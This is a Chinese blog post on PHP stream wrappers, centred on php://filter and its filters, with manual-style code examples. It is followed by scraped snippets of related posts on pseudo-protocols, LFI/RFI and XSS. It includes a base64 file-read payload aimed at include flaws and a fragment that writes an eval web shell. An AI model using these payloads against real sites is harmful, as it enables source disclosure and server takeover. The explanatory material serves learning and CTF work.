php 伪协议

最近php伪协议的各种神奇妙用好像突然又常常提到了,php中支持的伪协议有下面这么多


1

2

3

4

5

6

7

8

9

10

11

12


file:// — 访问本地文件系统

http:// — 访问 HTTP(s) 网址

ftp:// — 访问 FTP(s) URLs

php:// — 访问各个输入/输出流(I/O streams)

zlib:// — 压缩流

data:// — 数据(RFC 2397)

glob:// — 查找匹配的文件路径模式

phar:// — PHP 归档

ssh2:// — Secure Shell 2

rar:// — RAR

ogg:// — 音频流

expect:// — 处理交互式的流

今天着重研究php://

首先先把官方文档贴上来
http://php.net/manual/zh/wrappers.php.php

有两个比较重要的配置在php.ini中,allow_url_fopen 和allow_url_include会影响到fopen等等和include等等函数对于伪协议的支持,而allow_url_include依赖allow_url_fopen,所以allow_url_fopen不开启的话,allow_url_include也是无法使用的。

php://是用来访问各个输入、输出流的,除了php://stdin, php://stdout 和 php://stderr

php://input

php://input代表可以访问请求的原始数据,简单来说POST请求的情况下,php://input可以获取到post的数据。

比较特殊的一点,enctype=”multipart/form-data” 的时候 php://input 是无效的。

php://output

php://output 是一个只写的数据流, 允许你以 print 和 echo 一样的方式 写入到输出缓冲区。

php://filter

这篇文章的关键在于讨论php://filter,事实上,这也是我们常常使用的一个伪协议,在任意文件读取,甚至getshell的时候都有利用的机会。

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

事实上,在include函数的使用上,经常会造成任意文件读取漏洞,而file_get_contents()和file_put_contents()这样函数下,常常会构成getshell等更严重的漏洞。

php://filter 目标使用以下的参数作为它路径的一部分。 复合过滤链能够在一个路径上指定。详细使用这些参数可以参考具体范例。

文档里是这么写的


1

2

3

4

5


名称 描述

resource=<要过滤的数据流> 这个参数是必须的。它指定了你要筛选过滤的数据流。

read=<读链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。

<;两个链的筛选列表> 任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

我们举一个例子,这是平时我们用来任意文件读取的payload


1

php://filter/read=convert.base64-encode/resource=upload.php

这里读的过滤器为convert.base64-encode,就和字面上的意思一样,把输入流base64-encode。
resource=upload.php,代表读取upload.php的内容

下面仔细研究下关于过滤器的问题

过滤器

先贴文档,不因为自己的翻译小问题接锅 (?ω?)ノ
http://php.net/manual/zh/filters.php

转换过滤器

http://php.net/manual/zh/filters.convert.php

convert.* 过滤器是php5.0.0以后添加的。

base64

convert.base64-encode和 convert.base64-decode使用这两个过滤器等同于分别用 base64_encode()和 base64_decode()函数处理所有的流数据。 convert.base64-encode支持以一个关联数组给出的参数。如果给出了 line-length,base64 输出将被用 line-length个字符为 长度而截成块。如果给出了 line-break-chars,每块将被用给出的字符隔开。这些参数的效果和用 base64_encode()再加上 chunk_split()相同。

当然,这里的过滤器不止运用于php://filter,所以文档中给出的例子是这样的


1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22


<?php

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘convert.base64-encode‘);

fwrite($fp, "This is a test.\n");

fclose($fp);

/* Outputs: VGhpcyBpcyBhIHRlc3QuCg== */

$param = array(‘line-length‘ => 8, ‘line-break-chars‘ => "\r\n");

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘convert.base64-encode‘, STREAM_FILTER_WRITE, $param);

fwrite($fp, "This is a test.\n");

fclose($fp);

/* Outputs: VGhpcyBp

: cyBhIHRl

: c3QuCg== */

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘convert.base64-decode‘);

fwrite($fp, "VGhpcyBpcyBhIHRlc3QuCg==");

fclose($fp);

/* Outputs: This is a test. */

?>

quoted-printable

convert.quoted-printable-encode和 convert.quoted-printable-decode使用此过滤器的 decode 版本等同于用 quoted_printable_decode()函数处理所有的流数据。没有和 convert.quoted-printable-encode相对应的函数。 convert.quoted-printable-encode支持以一个关联数组给出的参数。除了支持和 convert.base64-encode一样的附加参数外, convert.quoted-printable-encode还支持布尔参数 binary和 force-encode-first。 convert.base64-decode只支持 line-break-chars参数作为从编码载荷中剥离的类型提示。

关于quoted_printable_decode()在php.net上的解释是将 quoted-printable 字符串转换为 8-bit 字符串,原谅我没怎么看懂

字符串过滤器

string.*是用来处理各个字符串的,比较像python的string模块

string.rot13

rot13,很好理解


1

2

3

4

5

6


<?php

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘string.rot13‘);

fwrite($fp, "This is a test.\n");

/* Outputs: Guvf vf n grfg. */

?>

toupper

变大写,也同样很好理解


1

2

3

4

5

6


<?php

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘string.toupper‘);

fwrite($fp, "This is a test.\n");

/* Outputs: THIS IS A TEST. */

?>

tolower

这回是小写


1

2

3

4

5

6


<?php

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘string.tolower‘);

fwrite($fp, "This is a test.\n");

/* Outputs: this is a test. */

?>

string.strip_tags

string.strip_tags(自 PHP 5.0.0 起)使用此过滤器等同于用 strip_tags()函数处理所有的流数据。可以用两种格式接收参数:一种是和 strip_tags()函数第二个参数相似的一个包含有标记列表的字符串,一种是一个包含有标记名的数组。

strip_tags()返回给定的字符串 str 去除空字符、HTML 和 PHP 标记后的结果。


1

2

3

4

5

6

7

8

9

10

11

12

13


<?php

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘string.strip_tags‘, STREAM_FILTER_WRITE, "<b><i><u>");

fwrite($fp, "<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\n");

fclose($fp);

/* Outputs: <b>bolded text</b> enlarged to a level 1 heading */

$fp = fopen(‘php://output‘, ‘w‘);

stream_filter_append($fp, ‘string.strip_tags‘, STREAM_FILTER_WRITE, array(‘b‘,‘i‘,‘u‘));

fwrite($fp, "<b>bolded text</b> enlarged to a <h1>level 1 heading</h1>\n");

fclose($fp);

/* Outputs: <b>bolded text</b> enlarged to a level 1 heading */

?>

压缩过滤器

zlib.* 压缩过滤器自 PHP 版本 5.1.0起可用,在激活 zlib的前提下。也可以通过安装来自 ? PECL的 ? zlib_filter包作为一个后门在 5.0.x版中使用。此过滤器在 PHP 4 中 不可用。

zlib.deflate和 zlib.inflate是主要的两个用法


1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27


<?php

$params = array(‘level‘ => 6, ‘window‘ => 15, ‘memory‘ => 9);

$original_text = "This is a test.\nThis is only a test.\nThis is not an important string.\n";

echo "The original text is " . strlen($original_text) . " characters long.\n";

$fp = fopen(‘test.deflated‘, ‘w‘);

stream_filter_append($fp, ‘zlib.deflate‘, STREAM_FILTER_WRITE, $params);

fwrite($fp, $original_text);

fclose($fp);

echo "The compressed file is " . filesize(‘test.deflated‘) . " bytes long.\n";

echo "The original text was:\n";

/* Use readfile and zlib.inflate to decompress on the fly */

readfile(‘php://filter/zlib.inflate/resource=test.deflated‘);

/* Generates output:

The original text is 70 characters long.

The compressed file is 56 bytes long.

The original text was:

This is a test.

This is only a test.

This is not an important string.

*/

?>

加密过滤器

mcrypt.和 mdecrypt.使用 libmcrypt 提供了对称的加密和解密。

格式为 mcrypt.ciphername,其中 ciphername是密码的名字,将被传递给 mcrypt_module_open()。有以下五个过滤器参数可用:

参数 是否必须 默认值 取值举例
mode 可选 cbc cbc, cfb, ecb, nofb, ofb, stream
algorithms_dir 可选 ini_get(‘mcrypt.algorithms_dir’) a lgorithms 模块的目录
modes_dir 可选 ini_get(‘mcrypt.modes_dir’) modes 模块的目录
iv 必须 N/A 典型为 8,16 或 32 字节的二进制数据。根据密码而定
key 必须 N/A 典型为 8,16 或 32 字节的二进制数据。根据密码而定

细节自己研究文档吧
http://php.net/manual/zh/filters.encryption.php

时间: 2024-11-10 05:39:23

php 伪协议的相关文章

javascritp伪协议

[javascritp伪协议] 将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中.这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行.如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开.这样的URL如下所示: 1 javascript:var now = new Date(); "<h1>The time is:</h

【JavaScript】javascript中伪协议(javascript:)使用探讨

javascript:这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行. 比如下面这个死链接: <a href="javascript:void(0)">No response link</a> 将javascript代码添加到客户端的方法是把它放置在伪协议说明符号 javascript:后的URL中.这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运

JavaScript中伪协议 javascript:研究

将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中.这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行.如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开.这样的URL如下所示: javascript:var now = new Date(); "<h1>The time is:</h1>" + now;

JavaScript伪协议

[javascript 伪协议] 将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中.这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行.如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开.这样的URL如下所示: 1 javascript:var now = new Date(); "<h1>The time is:</

&quot;javascript:&quot; 伪协议与平稳退化

"javascript:"伪协议是一种非标准化协议,其可以让我们通过一个链接调用javascript 函数.例如:<a href="javascript:pop('http://www.xxx');">Example</a> 但是这样也有一些问题,那就是这种形式在支持伪协议的浏览器中可以使用,但是老旧的浏览器则会尝试打开这个链接并且报错. 同时随着一些用户操作'禁用javascript'(不得不说,部分用户会禁用js以阻止一些网页弹窗,而一些

PHP伪协议

PHP伪协议 首先我们需要先了解一下我们在CTF中可能遇到的文件包含函数: 1.  include      2.  require      3.  include_once     4.  require_once    5.  highlight_file 6.  show_source   7.  readfile   8.  file_get_contents   9.  fopen   10. file(比较常见) PHP伪协议事实上就是支持的协议与封装协议(12种) a.  fil

filter_var 函数()使用javascript伪协议绕过执行xss

escape 过滤器来过滤link,而实际上这里的 escape 过滤器,是用PHP内置函数 htmlspecialchars 来实现的 htmlspecialchars 函数定义如下: htmlspecialchars:(PHP 4, PHP 5, PHP 7) 功能 :将特殊字符转换为 HTML 实体 定义 :string htmlspecialchars ( string $string [, int $flags = ENT_COMPAT | ENT_HTML401 [, string$

PHP RFI/伪协议

一道简单的题,学习远程文件包含与伪协议 题目描述: 方法一: 使用url实现php远程文件包含 在服务器上构造1.txt <?php $a = "<?php eval(\$_POST['123'])?>"; $b = fopen("a.php","w") or die("123!"); fwrite($b,$a); fclose($b); ?> 访问: http://ip1/index.php?url=

LFI &amp; RFI &amp; PHP封装协议之安全问题研究

目录 1. 文件包含的基本概念 2. LFI(Local File Include) 3. RFI(Remote File Include) 4. PHP中的封装协议(伪协议).PHP的流式文件操作模式所带来的问题 1. 文件包含的基本概念 严格来说,文件包含漏洞是"代码注入"的一种."代码注入"这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行."代码注入"的典型代码就是文件包含(File Inclusion),我的理解是叫&